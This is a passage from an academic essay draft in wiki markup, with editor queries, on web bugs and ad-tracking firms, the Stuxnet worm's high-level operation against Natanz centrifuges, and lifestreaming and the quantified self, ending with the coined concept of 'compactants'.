(2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
